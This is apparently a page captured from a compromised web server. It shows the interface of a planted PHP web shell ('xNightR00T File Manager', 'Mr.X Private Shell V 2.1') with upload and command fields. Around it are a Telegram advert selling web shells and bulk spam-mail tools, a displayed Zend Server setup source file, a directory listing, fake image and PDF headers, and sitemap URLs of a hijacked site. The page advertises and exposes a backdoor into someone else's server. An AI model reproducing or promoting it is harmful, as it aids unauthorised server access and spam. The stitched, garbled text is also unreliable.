xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

class ZServer_Cli_Tool_Setup extends ZServer_Cli_Tool 
{
    const EXIT_ZSERROR = 31;
    
    protected $_toolName = 'zs-setup';
    
    protected $_toolDescription = 'Configure basic Zend Server options';
    
    protected $_commandClasses = array(
        'set-password'      => 'ZServer_Cli_Tool_Command_Setup_SetPassword',
        'set-license'       => 'ZServer_Cli_Tool_Command_Setup_SetLicense',
        'show-eula'         => 'ZServer_Cli_Tool_Command_Setup_ShowEula',
        'accept-eula'       => 'ZServer_Cli_Tool_Command_Setup_AcceptEula',
        'add-api-key'       => 'ZServer_Cli_Tool_Command_Setup_AddApiKey',
        'list-api-keys'     => 'ZServer_Cli_Tool_Command_Setup_ListApiKeys',
        'show-api-key'      => 'ZServer_Cli_Tool_Command_Setup_ShowApiKey',
        'revoke-api-key'    => 'ZServer_Cli_Tool_Command_Setup_RevokeApiKey',
        'set-nodes-license' => 'ZServer_Cli_Tool_Command_Setup_SetNodesLicense',
        'create-cluster-db' => 'ZServer_Cli_Tool_Command_Setup_CreateClusterDb',
    );
    
    /**
     * Pre-run actions: bootstrap the Zend Server GUI model environment so that
     * we can re-use GUI code
     * 
     * @see ZServer_Cli_Tool::_preRun()
     */
    protected function _preRun()
    {
        if (getenv('ZEND_SERVER_GUI_PATH')) { 
            define('ZEND_SERVER_GUI_PATH', getenv('ZEND_SERVER_GUI_PATH'));
        } else {
            throw new ZServer_Cli_Tool_Exception("the ZEND_SERVER_GUI_PATH environment variable is not set", 1);
        }
        
        define('ZEND_SERVER_APP_PATH',     ZEND_SERVER_GUI_PATH . '/application');
        define('ZEND_SERVER_INSTALL_PATH', dirname(ZEND_SERVER_GUI_PATH));

        require_once ZEND_SERVER_APP_PATH . '/application.php'; // Define the ZEND_SERVER_APP_PATH

        define('ZEND_SERVER_SKU_PATH',  ZEND_SERVER_APP_PATH . DIRECTORY_SEPARATOR . ZEND_SERVER_APP_VERSION);
        define('ZEND_SERVER_DATA_PATH', ZEND_SERVER_APP_PATH . '/data');
        define('ZEND_SERVER_CONFIGURATION_FILE', ZEND_SERVER_DATA_PATH . '/zend-server.ini');
        define('ZEND_SERVER_USER_CONFIGURATION_FILE', ZEND_SERVER_DATA_PATH . '/zend-server-user.ini');
        
        // Set the include path
        $includePath = ZEND_SERVER_GUI_PATH . '/library';
        
        // This switch has no break on purpose (fall through all editionis)
        switch(ZEND_SERVER_APP_VERSION) {
            case 'EE': $includePath .= PATH_SEPARATOR . ZEND_SERVER_APP_PATH . '/EE/models';
            case 'PE': $includePath .= PATH_SEPARATOR . ZEND_SERVER_APP_PATH . '/PE/models';
            case 'CE': $includePath .= PATH_SEPARATOR . ZEND_SERVER_APP_PATH . '/CE/models';
        }

        set_include_path($includePath . PATH_SEPARATOR . get_include_path());

        Zend_Loader_Autoloader::getInstance()->setFallbackAutoloader(true);

		/**
 		 * Disable Zend Framework locale cache
 		 * Bug in PHP 5.3/Windows, function: is_writable() return flase on writable directory
 		 */
        Zend_Locale::disableCache(true);

        /**
         * In order to use date() style formatting also in Zend_Date
         */
        Zend_Date::setOptions(array('format_type' => 'php'));
        
        // Load application configuration
        ApplicationModel::loadConfiguration();
        
        define('ZEND_SERVER_TEMP_PATH', ApplicationModel::getGuiTempDir());
        
        // Set default DB adapter
        Context_Db_DefaultAdapter::init();
        
        // Enable debug logging
        if ($this->_debugEnabled && $this->_outStream instanceof ZServer_Cli_OutputStream_Standard) { 
            Zwas_Log::setLoggerWriter(new Zend_Log_Writer_Stream($this->_outStream->getStdErrStreamName()));
        }
    }
}

Filemanager

Name Type Size Permission Actions
Command Folder 0755
Exception.php File 73 B 0644
Manage.php File 3.11 KB 0644
Setup.php File 3.63 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml